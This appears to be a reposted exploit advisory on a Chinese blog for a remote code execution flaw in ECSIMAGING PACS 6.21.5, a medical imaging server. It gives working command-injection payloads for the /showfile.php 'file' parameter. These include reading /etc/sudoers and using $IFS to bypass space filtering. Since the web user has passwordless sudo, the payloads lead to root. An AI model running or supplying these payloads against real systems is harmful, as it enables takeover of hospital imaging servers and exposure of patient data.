ECSIMAGING_PACS_6.21.5_遠程代碼執行漏洞

# ECSIMAGING PACS 6.21.5 遠程代碼執行漏洞
==EXP==

# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
www-data user has sudo NOPASSWD access :

/showfile.php?file=/etc/sudoers
[...]
www-data ALL=NOPASSWD: ALL
[...]

Command injection can be realized with the $IFS tricks : /showfile.php?file=;ls$IFS-la$IFS/

/showfile.php?file=;sudo$IFS-l
[...]
User www-data may run the following commands on this host:
(root) NOPASSWD: ALL
[...]
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容